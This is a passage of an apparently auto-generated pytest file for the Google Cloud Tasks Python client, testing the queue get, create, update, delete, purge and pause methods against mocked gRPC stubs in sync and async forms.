assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_get_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_queue(
cloudtasks.GetQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_get_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_queue(
cloudtasks.GetQueueRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [cloudtasks.CreateQueueRequest, dict,])
def test_create_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue(
name="name_value",
state=gct_queue.Queue.State.RUNNING,
app_engine_http_target=target.AppEngineHttpTarget(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
def test_create_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
client.create_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateQueueRequest()
@pytest.mark.asyncio
async def test_create_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.CreateQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gct_queue.Queue(name="name_value", state=gct_queue.Queue.State.RUNNING,)
)
response = await client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
@pytest.mark.asyncio
async def test_create_queue_async_from_dict():
await test_create_queue_async(request_type=dict)
def test_create_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateQueueRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
call.return_value = gct_queue.Queue()
client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateQueueRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
await client.create_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_create_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_queue(
parent="parent_value", queue=gct_queue.Queue(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].queue
mock_val = gct_queue.Queue(name="name_value")
assert arg == mock_val
def test_create_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_queue(
cloudtasks.CreateQueueRequest(),
parent="parent_value",
queue=gct_queue.Queue(name="name_value"),
)
@pytest.mark.asyncio
async def test_create_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_queue(
parent="parent_value", queue=gct_queue.Queue(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].queue
mock_val = gct_queue.Queue(name="name_value")
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_queue(
cloudtasks.CreateQueueRequest(),
parent="parent_value",
queue=gct_queue.Queue(name="name_value"),
)
@pytest.mark.parametrize("request_type", [cloudtasks.UpdateQueueRequest, dict,])
def test_update_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue(
name="name_value",
state=gct_queue.Queue.State.RUNNING,
app_engine_http_target=target.AppEngineHttpTarget(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.UpdateQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
def test_update_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
client.update_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.UpdateQueueRequest()
@pytest.mark.asyncio
async def test_update_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.UpdateQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gct_queue.Queue(name="name_value", state=gct_queue.Queue.State.RUNNING,)
)
response = await client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.UpdateQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_queue.Queue)
assert response.name == "name_value"
assert response.state == gct_queue.Queue.State.RUNNING
@pytest.mark.asyncio
async def test_update_queue_async_from_dict():
await test_update_queue_async(request_type=dict)
def test_update_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.UpdateQueueRequest()
request.queue.name = "queue.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
call.return_value = gct_queue.Queue()
client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "queue.name=queue.name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.UpdateQueueRequest()
request.queue.name = "queue.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
await client.update_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "queue.name=queue.name/value",) in kw["metadata"]
def test_update_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_queue(
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].queue
mock_val = gct_queue.Queue(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
def test_update_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_queue(
cloudtasks.UpdateQueueRequest(),
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_queue.Queue()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_queue(
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].queue
mock_val = gct_queue.Queue(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
@pytest.mark.asyncio
async def test_update_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_queue(
cloudtasks.UpdateQueueRequest(),
queue=gct_queue.Queue(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.parametrize("request_type", [cloudtasks.DeleteQueueRequest, dict,])
def test_delete_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteQueueRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
client.delete_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteQueueRequest()
@pytest.mark.asyncio
async def test_delete_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.DeleteQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteQueueRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_queue_async_from_dict():
await test_delete_queue_async(request_type=dict)
def test_delete_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
call.return_value = None
client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_queue(
cloudtasks.DeleteQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_delete_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_queue(
cloudtasks.DeleteQueueRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [cloudtasks.PurgeQueueRequest, dict,])
def test_purge_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
app_engine_http_target=target.AppEngineHttpTarget(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PurgeQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
def test_purge_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
client.purge_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PurgeQueueRequest()
@pytest.mark.asyncio
async def test_purge_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.PurgeQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(name="name_value", state=queue.Queue.State.RUNNING,)
)
response = await client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PurgeQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
@pytest.mark.asyncio
async def test_purge_queue_async_from_dict():
await test_purge_queue_async(request_type=dict)
def test_purge_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PurgeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
call.return_value = queue.Queue()
client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_purge_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PurgeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_purge_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.purge_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_purge_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.purge_queue(
cloudtasks.PurgeQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_purge_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.purge_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_purge_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.purge_queue(
cloudtasks.PurgeQueueRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [cloudtasks.PauseQueueRequest, dict,])
def test_pause_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
app_engine_http_target=target.AppEngineHttpTarget(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PauseQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
def test_pause_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
client.pause_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PauseQueueRequest()
@pytest.mark.asyncio
async def test_pause_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.PauseQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(name="name_value", state=queue.Queue.State.RUNNING,)
)
response = await client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PauseQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
@pytest.mark.asyncio
async def test_pause_queue_async_from_dict():
await test_pause_queue_async(request_type=dict)
def test_pause_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PauseQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
call.return_value = queue.Queue()
client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_pause_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PauseQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_pause_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.pause_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_pause_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.pause_queue(
cloudtasks.PauseQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_pause_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.pause_queue(name="name_value",)
